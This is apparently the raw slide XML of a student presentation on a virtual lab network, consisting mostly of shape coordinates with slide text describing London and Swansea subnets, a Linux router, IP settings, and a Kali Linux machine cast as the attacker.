                    <a:pt x="6235232" y="1197679"/>
                    <a:pt x="6192343" y="1198323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6117131" y="1199612"/>
                    <a:pt x="6041418" y="1202485"/>
                    <a:pt x="5966562" y="1203723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5933144" y="1204338"/>
                    <a:pt x="5900754" y="1201974"/>
                    <a:pt x="5867227" y="1201847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5788180" y="1201796"/>
                    <a:pt x="5708354" y="1203933"/>
                    <a:pt x="5630172" y="1202248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5535908" y="1200213"/>
                    <a:pt x="5442984" y="1194779"/>
                    <a:pt x="5348949" y="1191768"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5313810" y="1190551"/>
                    <a:pt x="5277251" y="1192179"/>
                    <a:pt x="5241228" y="1192408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5151316" y="1192775"/>
                    <a:pt x="5061657" y="1192349"/>
                    <a:pt x="4971133" y="1193559"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4937685" y="1193988"/>
                    <a:pt x="4903114" y="1199299"/>
                    <a:pt x="4869416" y="1200519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4830283" y="1201947"/>
                    <a:pt x="4791348" y="1202215"/>
                    <a:pt x="4753274" y="1200850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4705682" y="1199144"/>
                    <a:pt x="4659172" y="1194829"/>
                    <a:pt x="4611883" y="1192701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4533819" y="1189298"/>
                    <a:pt x="4455420" y="1186135"/>
                    <a:pt x="4376825" y="1184131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4347226" y="1183446"/>
                    <a:pt x="4315374" y="1187423"/>
                    <a:pt x="4285471" y="1187158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4145774" y="1185753"/>
                    <a:pt x="4006046" y="1184162"/>
                    <a:pt x="3866543" y="1181596"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3794230" y="1180207"/>
                    <a:pt x="3723633" y="1175551"/>
                    <a:pt x="3651342" y="1174348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3607885" y="1173562"/>
                    <a:pt x="3561907" y="1178044"/>
                    <a:pt x="3518453" y="1177258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3478287" y="1176568"/>
                    <a:pt x="3440399" y="1171400"/>
                    <a:pt x="3400818" y="1169685"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3279824" y="1164099"/>
                    <a:pt x="3157310" y="1160621"/>
                    <a:pt x="3037154" y="1153217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2978373" y="1149708"/>
                    <a:pt x="2922429" y="1140508"/>
                    <a:pt x="2866260" y="1132283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2771049" y="1118489"/>
                    <a:pt x="2677107" y="1103380"/>
                    <a:pt x="2582173" y="1088979"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2511090" y="1078352"/>
                    <a:pt x="2447356" y="1063086"/>
                    <a:pt x="2395406" y="1035945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2371411" y="1023508"/>
                    <a:pt x="2331675" y="1015582"/>
                    <a:pt x="2294751" y="1014618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2228580" y="1012920"/>
                    <a:pt x="2177384" y="998698"/>
                    <a:pt x="2122944" y="984751"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2054121" y="967003"/>
                    <a:pt x="1981585" y="951294"/>
                    <a:pt x="1905504" y="941380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1830544" y="931682"/>
                    <a:pt x="1747929" y="932141"/>
                    <a:pt x="1671045" y="924228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1625936" y="919523"/>
                    <a:pt x="1585613" y="907528"/>
                    <a:pt x="1543856" y="898190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1502093" y="888855"/>
                    <a:pt x="1460606" y="878913"/>
                    <a:pt x="1419784" y="868500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1397486" y="862806"/>
                    <a:pt x="1378078" y="854435"/>
                    <a:pt x="1355116" y="849214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1311848" y="839527"/>
                    <a:pt x="1265353" y="832754"/>
                    <a:pt x="1223713" y="821702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1183577" y="811001"/>
                    <a:pt x="1138864" y="809072"/>
                    <a:pt x="1094193" y="804872"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1060244" y="801784"/>
                    <a:pt x="1034230" y="787936"/>
                    <a:pt x="1001115" y="783030"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="953853" y="775990"/>
                    <a:pt x="916853" y="764276"/>
                    <a:pt x="879548" y="747884"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="837586" y="729513"/>
                    <a:pt x="770061" y="725929"/>
                    <a:pt x="711163" y="719039"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="661152" y="713146"/>
                    <a:pt x="604343" y="715774"/>
                    <a:pt x="557941" y="707101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525381" y="700984"/>
                    <a:pt x="499355" y="684493"/>
                    <a:pt x="480347" y="668702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437718" y="632865"/>
                    <a:pt x="370204" y="616630"/>
                    <a:pt x="296224" y="603583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220741" y="590184"/>
                    <a:pt x="148480" y="573869"/>
                    <a:pt x="72689" y="560892"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="543486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="384357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51784" y="393937"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="104770" y="397707"/>
                    <a:pt x="153378" y="409086"/>
                    <a:pt x="205561" y="414859"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254062" y="420400"/>
                    <a:pt x="305001" y="422574"/>
                    <a:pt x="354391" y="426667"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386450" y="429269"/>
                    <a:pt x="420771" y="429847"/>
                    <a:pt x="448281" y="436308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499904" y="448391"/>
                    <a:pt x="551004" y="446576"/>
                    <a:pt x="611518" y="434166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="654695" y="425361"/>
                    <a:pt x="702395" y="422710"/>
                    <a:pt x="746076" y="422520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="798481" y="422218"/>
                    <a:pt x="848400" y="419817"/>
                    <a:pt x="902724" y="409989"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="977291" y="396518"/>
                    <a:pt x="1048428" y="397321"/>
                    <a:pt x="1113854" y="414230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1184155" y="432145"/>
                    <a:pt x="1258677" y="446437"/>
                    <a:pt x="1333449" y="459938"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1354772" y="463883"/>
                    <a:pt x="1385284" y="463304"/>
                    <a:pt x="1408608" y="458278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1483492" y="441930"/>
                    <a:pt x="1561495" y="427025"/>
                    <a:pt x="1630191" y="403061"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1735315" y="366348"/>
                    <a:pt x="1840887" y="337881"/>
                    <a:pt x="1956289" y="332366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1986669" y="330865"/>
                    <a:pt x="2019100" y="336056"/>
                    <a:pt x="2042814" y="344002"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2085261" y="358150"/>
                    <a:pt x="2126350" y="370413"/>
                    <a:pt x="2183420" y="369635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2235035" y="368879"/>
                    <a:pt x="2279659" y="405942"/>
                    <a:pt x="2269566" y="439859"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2258267" y="478101"/>
                    <a:pt x="2277762" y="504964"/>
                    <a:pt x="2331129" y="524163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2352980" y="531807"/>
                    <a:pt x="2364861" y="546162"/>
                    <a:pt x="2385112" y="555357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2401860" y="562976"/>
                    <a:pt x="2421927" y="570875"/>
                    <a:pt x="2444033" y="572629"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2483469" y="575878"/>
                    <a:pt x="2509763" y="584022"/>
                    <a:pt x="2525979" y="603233"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2549282" y="631254"/>
                    <a:pt x="2578520" y="657481"/>
                    <a:pt x="2603911" y="684825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2618910" y="700624"/>
                    <a:pt x="2643515" y="707120"/>
                    <a:pt x="2678828" y="706990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2699243" y="707100"/>
                    <a:pt x="2725615" y="705603"/>
                    <a:pt x="2738094" y="711376"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2805960" y="742855"/>
                    <a:pt x="2895980" y="733032"/>
                    <a:pt x="2983806" y="728243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2993929" y="727744"/>
                    <a:pt x="3004007" y="726871"/>
                    <a:pt x="3013997" y="725446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3136002" y="707474"/>
                    <a:pt x="3250133" y="713470"/>
                    <a:pt x="3364419" y="720577"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3394563" y="722507"/>
                    <a:pt x="3428050" y="719807"/>
                    <a:pt x="3460521" y="717628"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3545330" y="712137"/>
                    <a:pt x="3633314" y="698262"/>
                    <a:pt x="3710982" y="714182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3772122" y="726607"/>
                    <a:pt x="3825029" y="745116"/>
                    <a:pt x="3850961" y="778802"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3868395" y="801427"/>
                    <a:pt x="3898481" y="813185"/>
                    <a:pt x="3946286" y="816372"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3987480" y="819179"/>
                    <a:pt x="4025130" y="827781"/>
                    <a:pt x="4065132" y="832459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4086246" y="834922"/>
                    <a:pt x="4110400" y="838274"/>
                    <a:pt x="4132173" y="835167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4190358" y="826865"/>
                    <a:pt x="4249453" y="817300"/>
                    <a:pt x="4305858" y="804156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4334041" y="797490"/>
                    <a:pt x="4360739" y="782919"/>
                    <a:pt x="4382131" y="769481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4404161" y="755388"/>
                    <a:pt x="4425552" y="747047"/>
                    <a:pt x="4453289" y="752531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4522267" y="766292"/>
                    <a:pt x="4590589" y="780524"/>
                    <a:pt x="4657971" y="795835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4669645" y="798513"/>
                    <a:pt x="4675987" y="807238"/>
                    <a:pt x="4682399" y="813876"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4712325" y="844914"/>
                    <a:pt x="4739115" y="876968"/>
                    <a:pt x="4771814" y="907046"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4783117" y="917329"/>
                    <a:pt x="4807945" y="922850"/>
                    <a:pt x="4827520" y="929876"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4833681" y="932206"/>
                    <a:pt x="4845543" y="931081"/>
                    <a:pt x="4849942" y="933851"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4888949" y="959631"/>
                    <a:pt x="4951287" y="954890"/>
                    <a:pt x="5009626" y="957896"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5059523" y="960407"/>
                    <a:pt x="5111928" y="960104"/>
                    <a:pt x="5158711" y="963814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5231307" y="969696"/>
                    <a:pt x="5298173" y="973751"/>
                    <a:pt x="5376427" y="963151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5408579" y="958754"/>
                    <a:pt x="5448461" y="970245"/>
                    <a:pt x="5475787" y="980508"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5528518" y="1000363"/>
                    <a:pt x="5584839" y="1001958"/>
                    <a:pt x="5653401" y="987268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5676008" y="982341"/>
                    <a:pt x="5702558" y="984595"/>
                    <a:pt x="5726340" y="985357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5748643" y="985952"/>
                    <a:pt x="5770110" y="988364"/>
                    <a:pt x="5790563" y="991300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5815128" y="994969"/>
                    <a:pt x="5845522" y="996110"/>
                    <a:pt x="5860260" y="1004958"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5906803" y="1032493"/>
                    <a:pt x="5977069" y="1037385"/>
                    <a:pt x="6042101" y="1036226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6128232" y="1034888"/>
                    <a:pt x="6222269" y="1027704"/>
                    <a:pt x="6301998" y="989138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6349672" y="965909"/>
                    <a:pt x="6396952" y="955198"/>
                    <a:pt x="6452025" y="968489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6489401" y="977695"/>
                    <a:pt x="6558002" y="960731"/>
                    <a:pt x="6589205" y="939474"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6600499" y="931821"/>
                    <a:pt x="6612148" y="924116"/>
                    <a:pt x="6631069" y="911222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6674305" y="951313"/>
                    <a:pt x="6752346" y="944332"/>
                    <a:pt x="6828274" y="942941"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6874780" y="942157"/>
                    <a:pt x="6889173" y="963896"/>
                    <a:pt x="6900803" y="984140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6921316" y="1020676"/>
                    <a:pt x="6959796" y="1032557"/>
                    <a:pt x="7034668" y="1018665"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7117337" y="1003282"/>
                    <a:pt x="7199637" y="985309"/>
                    <a:pt x="7281067" y="966327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7332521" y="954266"/>
                    <a:pt x="7378029" y="936255"/>
                    <a:pt x="7412780" y="909206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7446535" y="882864"/>
                    <a:pt x="7455445" y="884046"/>
                    <a:pt x="7500327" y="894826"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7552743" y="907363"/>
                    <a:pt x="7606735" y="918164"/>
                    <a:pt x="7662324" y="927415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7679867" y="930387"/>
                    <a:pt x="7704114" y="926740"/>
                    <a:pt x="7725334" y="924844"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7761320" y="921787"/>
                    <a:pt x="7798617" y="920242"/>
                    <a:pt x="7833279" y="913031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7866516" y="906023"/>
                    <a:pt x="7898634" y="893700"/>
                    <a:pt x="7928605" y="881683"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8012311" y="848025"/>
                    <a:pt x="8088138" y="810205"/>
                    <a:pt x="8146597" y="762968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8154091" y="756800"/>
                    <a:pt x="8170249" y="752606"/>
                    <a:pt x="8183577" y="749005"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8205312" y="743071"/>
                    <a:pt x="8227788" y="737222"/>
                    <a:pt x="8250224" y="733642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8359189" y="716209"/>
                    <a:pt x="8441164" y="678078"/>
                    <a:pt x="8505929" y="626542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8524585" y="611796"/>
                    <a:pt x="8540107" y="608259"/>
                    <a:pt x="8564194" y="618796"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8592162" y="631043"/>
                    <a:pt x="8628032" y="619507"/>
                    <a:pt x="8660705" y="611069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8694442" y="602479"/>
                    <a:pt x="8728514" y="593651"/>
                    <a:pt x="8762255" y="585060"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8787227" y="578855"/>
                    <a:pt x="8811899" y="573069"/>
                    <a:pt x="8836439" y="566358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8912856" y="545447"/>
                    <a:pt x="8983243" y="538425"/>
                    <a:pt x="9050728" y="559575"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9102219" y="575830"/>
                    <a:pt x="9164950" y="573868"/>
                    <a:pt x="9229627" y="557464"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9237706" y="555368"/>
                    <a:pt x="9247529" y="550190"/>
                    <a:pt x="9253451" y="550855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9342568" y="560232"/>
                    <a:pt x="9405310" y="512383"/>
                    <a:pt x="9484214" y="498671"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9519035" y="492570"/>
                    <a:pt x="9552778" y="473783"/>
                    <a:pt x="9582633" y="458384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9623689" y="437231"/>
                    <a:pt x="9660183" y="417297"/>
                    <a:pt x="9719670" y="415607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9779189" y="414101"/>
                    <a:pt x="9830940" y="393878"/>
                    <a:pt x="9871784" y="366147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9903014" y="345075"/>
                    <a:pt x="9939570" y="338349"/>
                    <a:pt x="9984494" y="336660"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10040642" y="334503"/>
                    <a:pt x="10098165" y="326674"/>
                    <a:pt x="10154708" y="322193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10166953" y="321201"/>
                    <a:pt x="10182669" y="321603"/>
                    <a:pt x="10190446" y="325025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10285769" y="367692"/>
                    <a:pt x="10408999" y="350677"/>
                    <a:pt x="10530736" y="335953"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10604506" y="327127"/>
                    <a:pt x="10678397" y="316584"/>
                    <a:pt x="10752157" y="305117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10777120" y="301365"/>
                    <a:pt x="10803110" y="294636"/>
                    <a:pt x="10824452" y="285927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10868837" y="267698"/>
                    <a:pt x="10909147" y="246465"/>
                    <a:pt x="10953152" y="228102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10969622" y="221030"/>
                    <a:pt x="10991730" y="217688"/>
                    <a:pt x="11011614" y="214096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11046743" y="207573"/>
                    <a:pt x="11086641" y="206412"/>
                    <a:pt x="11116031" y="195421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11192467" y="166956"/>
                    <a:pt x="11266913" y="160299"/>
                    <a:pt x="11344303" y="166629"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11452657" y="175527"/>
                    <a:pt x="11551626" y="159519"/>
                    <a:pt x="11639050" y="108526"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11678385" y="85543"/>
                    <a:pt x="11720243" y="87879"/>
                    <a:pt x="11757532" y="96530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11800499" y="106640"/>
                    <a:pt x="11840704" y="105056"/>
                    <a:pt x="11885799" y="86728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11895784" y="82659"/>
                    <a:pt x="11910604" y="81867"/>
                    <a:pt x="11922874" y="81060"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11992783" y="75806"/>
                    <a:pt x="12063500" y="73647"/>
                    <a:pt x="12115331" y="33587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12125500" y="25715"/>
                    <a:pt x="12143693" y="20477"/>
                    <a:pt x="12158080" y="14081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6E610509-DF2D-028D-0EF7-5525EC92DBF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4020458" y="1677464"/>
            <a:ext cx="5908368" cy="1800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i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mj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CF72106-87DE-C9E6-1CFF-56D640AD08F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597659" y="306127"/>
            <a:ext cx="6476162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500" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Aptos Display" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Introduction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5711960-FEDC-4C71-F246-2712574C0DCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3151414" y="1075941"/>
            <a:ext cx="6477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  <a:t>This diagram shows the network setup used in this task.</a:t>
            </a:r>
            <a:b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</a:br>
            <a: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  <a:t>Two separate networks were created: London (192.168.1.0/24) and Swansea (192.168.2.0/24).</a:t>
            </a:r>
            <a:b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</a:br>
            <a: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  <a:t>The Linux machine acts as a router connecting both networks.</a:t>
            </a:r>
            <a:b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</a:br>
            <a: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  <a:t>All devices communicate through this router, and Kali Linux is used as an attacker within the Swansea network.</a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>The diagram represents the conceptual design of the network.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highligh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53416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891624-3655-DB9D-8935-C3F33E3B0770}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3462885" y="159679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Lab Setup (Virtual Machines)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2500" i="1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220472-4B46-E5F0-1469-AE41BB223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8691"/>
            <a:ext cx="12192000" cy="594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953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7F3F0990-75EE-C527-C299-B39803C260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480" y="151334"/>
            <a:ext cx="49160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800" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Network Setup (IP Configuration)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="18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42AFE1-F3D0-D6C2-3E6B-693306DF2506}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4880341"/>
            <a:ext cx="237940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500" i="1" dirty="0">
                <a:latin typeface="Aptos Display" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" i="1" dirty="0" err="1">
                <a:latin typeface="Aptos Display" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IPconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" i="1" dirty="0">
              <a:latin typeface="Aptos Display" panose="020B00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EFE027-453F-10C3-4592-60104DADC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5202" y="1266907"/>
            <a:ext cx="5644641" cy="343375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9132F3-04F3-1664-D0B1-F573A54211F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7156019" y="5179502"/>
            <a:ext cx="184846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S-DC IP config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30F8AA-2646-6608-035B-B9B42D6036AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2519520" y="4917891"/>
            <a:ext cx="3085989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IP Address: 192.168.2.20 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Subnet Mask: 255.255.255.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1300" i="1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70150-CC2D-CAF3-BF89-92597FDEEDF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9019515" y="5116157"/>
            <a:ext cx="2222196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IP Address: 192.168.2.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Subnet Mask: 255.255.255.0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6C202E-2C3C-7371-1506-8297ECA70D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6906"/>
            <a:ext cx="6109405" cy="343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82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CE219D28-F5FA-1CF5-4A6B-668E490710DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599767" y="504633"/>
            <a:ext cx="60960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i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Connectivity &amp; Routing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4A985-1080-92A3-3F5B-A100B49AA0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456" y="1847528"/>
            <a:ext cx="5931544" cy="3324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A78673-2649-3D0D-E8F3-F0617447A182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
